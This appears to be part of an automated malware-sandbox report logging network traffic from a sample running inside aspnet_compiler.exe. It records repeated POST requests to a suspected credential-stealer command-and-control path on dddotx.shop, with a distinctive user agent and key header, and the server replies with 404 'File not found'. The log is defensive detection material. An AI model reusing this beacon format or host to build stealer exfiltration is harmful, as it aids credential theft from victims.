Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 2_2_00404ED4 recv,

2_2_00404ED4

Source: global traffic

DNS traffic detected: DNS query: dddotx.shop

Source: unknown

HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 176Connection: close

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:37 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mzrtz%2FQF0X2cAeLlFJWI2z%2BAeAdP1etxRyi%2Fzh69K%2FYSgYngPgGa4HNOw3eP1bgcepWOE%2BAKIl7reduOnaGLl4kk%2BWu3IHn%2FRDQW%2F3lSf2wT5MlXhnwD0xHzrx7DBQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5bc08ddb0ca4-EWRData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:38 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m0XsUX3XgZvqZ8dvRLyh0Tae%2BF6G3vfbq6VSoRrdPb6EqohVU517Rv1BktkQ7gY3zOf4LhB%2FtQuwg%2BBYmu0agYCehTM%2BigkcgrqvlaA3agc92h259U8bZQb8hziMMg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5bc6b9f342fc-EWRData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:39 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5jmRWxvk%2FF%2B7m4F%2FOz1%2BVZYTqYewi9mxwwac1inb6YETltLvovYwz16ZsOGQb9ASpQXM9YTXCCFy%2BzSVe%2F7e%2B71D%2F6iHxEBmGTURdOh%2FWvWN7G4b7RVlOtp2jfoOBw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5bcb6815438b-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:40 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S%2FZfHpw5R3M0J12EljDtdW1ytxJT89wzT5CdW7RKt6Pno0EKM%2FCMU0gLB0HcmhNzqoCPVWec6tz725TyuijPkjNt5PPh%2FvNMO%2BvQt1%2BfH5yUXyGLca5TBaoFjvceLg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5bd0ed438cd4-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:41 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p2U1p7eDkJlqOhs9qnm5NQxCRqFW4eqgljVSCen09hiZ402lhYuyjNq7sj3fnzuCS3V%2FKGdncc%2F%2FLrzcNQLQ0%2Fg8iNfxr0y5ooE6OoGdMVGvj8eaSiTGfxvDiCHAZg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5bd69aea42c9-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:41 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wioAlAEMbQkipN2MwG8GDiYOseoIotRJd0Rh5QNazVCbbud%2Bq%2B0V4NPdFSBqKbveITUNHwe9VVaLWA5AtV4s2u385MVh0LVIcbtj%2FfMIoXPLvJdcYKT8iA7fqJQ6nw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5bdc79374251-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:42 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rB9yGoVCx%2FkFD5TN42cUsXMt3ijaSYyGxXAoL6%2BsS37Dr9FDD3gKWRK6dMsTkqT3MwQDY%2F8fZPWB6tIH%2BhizLE%2FoJ4w63V3tXktH9plhQN5PoLzFWqpPAPn9BLpQuw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5be1fbe072bc-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FzvV0zOHIpTP8DVXxLHNBUwLlZGnKeDaMeZXwNEol0fsg3a8xlvRrw%2FHotoF5Vr6crbHMrEicSE4H4eZmSrLwEaJvw6cUo3Zt6EMzbvcynCP8Q1C3UqVDHP0GKAzrA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5be7699a8c29-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:44 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E67iXCs2O93RwzjD9kPT1AcB0DOQ7qfQCK1v3u5GnB0J1xm32C9yqFK1D9DmguKcoYTLhSWLqqIPiAoT9%2Fk29Vlex1UTJEcxKO8P62sDAYFfmFWJgfUnEq38%2FGTJCw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5beda9d041e6-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:45 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BuiDQ6Svr4d8lCW2K0zjebM%2B16WYG%2BtZHSk3vA4qVzAwlAOXinTcn73eB%2B2rHyEtnfGuD2AxwLQUIDlY6D0oRlkXeebiH9w05NfUR3%2FMG3J05o5IccC4ZDW8H3SRsw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5bf2fb4c729f-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:46 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DTBvAeC4uqz98Lew63Y7zLv76oS8zLQ%2BNDl2Zxw1p95UMsdCuQdyuUsUbjrWWHlIeybuGKhhJujbLOMfzrpyLpFWflk8M1ESM6MU6QGjwb0i4t68gTo5D02xcolcfw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5bf8aef9c337-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:47 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uJWOZwsYYbnj3hvE7B8LS5yUqCwrjQUKohvihvS8QpacDM3jg%2FMlWqxw%2FeoKBYZtJF6NyRwIOvS3aXQ5mXUOGq52A6Uiis0nBKsdkxTMXD824PCp6gc9R6pkf0pNFg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5bfdb8da3320-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:48 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QE9YIl5d%2FC3im0M%2BQBTNxHQux7T2K4cmAJIDu80eMw8C67NnrYTi4FL1g9KIShbzTslME9FaygGpl%2F9s92Ma%2FtfZeEomgKIMDDX2oXuJyW0AnvWhgS5J%2Bk1HqIwndg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c033e370f37-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:48 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O1hR8UKxf2PX2BE0NhsdpdLx%2BA9jdawS8%2BstnwWk8b%2BPXQqdhAfldm7uYQFgZ4BxMDLkULk7tnX%2BtSYRys%2FPU2TyZ%2Fw8KfogyfP3PTRhVr5xQmIT7VtGGETyRahU4A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c089e267cf6-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:49 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jj8kaF9VMW7WOW%2BApWGzWucOFzNDg4tbbX0xC%2BtYy8v1QFoJKYYNRJ70Or%2FmNkt2LsbErSUwTYc%2BkXlHmEDUmK9KG6Pu0i%2B9LuA1Dy4B3OvdyVoNjPVgcGvCS4Oo9A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c0e08074319-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:50 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uJJBJgDBK0AOSujO5ipOMwowYULtlw%2B9cUDNPwdeEnxoUw425C5Vt6duFTg8TTE%2FuvWRZ3Hw%2F9kQYMlIcv0VQKCDAjjr%2B6q21sVqwW%2BrwriA9wwCTESoel7FG7h%2BTQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c1429e94382-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:51 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G%2FMVh8%2FzavsZ%2F%2B7Vjoi7eSByvQUb%2BHhllcuqWA%2FBCxd3nKqgJrFLx%2FXUb4oQRIEwAzqE5N0DLXEIxdSGORQIwHJ92TGcllCrhBrUTsnir%2Fm9w%2BnsgvQG3QUFhJrmkQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c1a0ba94388-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:52 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qq5Cj405RHOFluwRyNentphqjmUqM3hbL344qXMXXrmxzdw%2BWMKHTE0599W2mdjHhLkeeIlSfn92wzcQKyHE5eZcjPUCPq8Xg%2FfTAvFP0oSZ0Fvn0Y4i3t8kfG64rw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c1f7c5e8c12-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LJ2IOR4pOOmPP7cmYLyQt5VX%2BzHvj%2B5ECTDB5tYmomcLO0C10WLyS91Zpx%2FQzMLEIN8sAcGGXueHZNk87lexHcqS8d5zusB%2Bg4dipv4tdfdexbVO1uwjJbIZLiOXwA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c24fedc1986-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:54 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dlAjJ8Qg6Ff6%2BgP4TQX37tzjqpqjM9tzK2CQWH17DRMtL6AVe0%2BU7be5hXxd0359%2B5blwEXSy5fHPFmehABuH%2BUfY0WSJ0KMJx7xrDr2iA2VJaV7OPdNnzxGyxxRhw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c2a4ea17d18-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:55 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GtT02wdkKW0NiE6Gsijqu4V3%2BjuGyqbIuFoAdXovGJJL%2Bjh0ryKOeDEvO%2FYa4UkzeyXjRMceZBpKsfthTCfIefeSzdu21h2lFmodgkjJNeYmtwOAizvTQmpBL7cusQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c2f5c0c5e76-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:56 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CgVtUfzbdU%2BspHap4sRciP6hQpKJST12uEnPafC8Ah5q5%2FHGOjFAuoItHpevTcFXcMtaPUOaFYTgehH6jnar3%2Bldm0lEzsNLIJlY0%2BjdhMAZif2pWDf2eOLeTs0FqA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c357b058c0c-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:57 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XuGHxOcWUC0ysvT2VmTBfS8bj%2BItpq%2Bnfr3Abdd6Kkb1RgKifoYmtXFin1Ton75loC9dhkkpZi3XdT4NlQIpjLtKPesn7dPCwpMc0TVo7dYLvwsdHp38cd1Kkjshfg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c3b2d1a0f83-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:58 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T9SgeCtD74V9z6FzuVFMUtfv6wTty84L8LyRpUr4lsKH7zxkg45vOwo4WmGbN6CUkVAXtFazh75NYDmh52unJ3rZt8R5ddobG7xrKvLKKkB8T3hs5GD5UruE3yc2qQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c427f056a55-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:59 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F0erpvwprs%2F1GlF1S2zhM66LqDqIvZUEp7vYse%2B0lXu9IA8xAFoD%2BDsd3kNo3AqXmG0bPa84CcrzEF6Hasgvz0Q539xRtmuA0HwQYxGpXBz9s1DAUVAG1Cz6rnXv%2FA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c47fdfe4246-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xV%2BB5qD1Yd3zPOgd8f2rP6tfzCIFL18jrdOSkEMQb9vMvMU6PNf8rueozDe7CmOCGiUjv42%2FtwGAmBhvpGkhkZ6uBxedCUNcKGbzFRhiViUxyFg0RsxNx%2FAQMOqzKw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c4e5ef34304-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3Y2YrUsCod5f6rEk2RjWB5or%2FgQNV4s2y1c%2FP8h29H%2B0vQjW66XsN2PVCKx7KlJBG1VcVKMGYSFv6584O3X%2BM1dXcdlWwGPthPq6UiQXS9tlpbEl4rTYNZvS628pgA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c548e43c448-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sjaS1C%2B5qyGeUVkysgFhLS7yN4MId4T2nL5Txdh9gKuqS9q6eUDmrXaFKCQY9tysJYdaAqVcMxFIpEOqoVxifdXMdD%2FOOWzoITlpCJcyPc604sG7F1rYn%2FuI0g7NbA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c5a1fc3c3f5-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2NdkSRxxj5GgSbDnDU4wQjq4kN9vggs1VEHzSjB5NpdNwqH5Qy1whvD2Fvg76FCQ9DsCwHHWRuIXP4tp4TIDH%2F5zHZUi96NURjzQIaCYkVJAOdn%2FbOCYaGlCvkXUug%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c5f9f130c8e-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KyxAcmXOfmyZHmlfTUdxE4hEL%2B5fKlmDYmp6L33qxOrVOSVo1rhveg2zpXwYx8Kh1wB%2BgJIca89JvOt37SqCBR8xM92MC1laLkIBZaVtUi8xQKqXj6IlyOHIRyTxNg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c65cbd54368-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7H0voRf4Ea7ANWxnKVc9K4%2FXsB8L8JWatlt%2BTGsZvO42aH2necDqzlj6iAd%2F3fv4umbdItfK2jRLKxN6N70OER6sL9ExURXSEQevKmS4aW2GeKzd0lKyiPXXknDixw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c6b1f0742dc-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
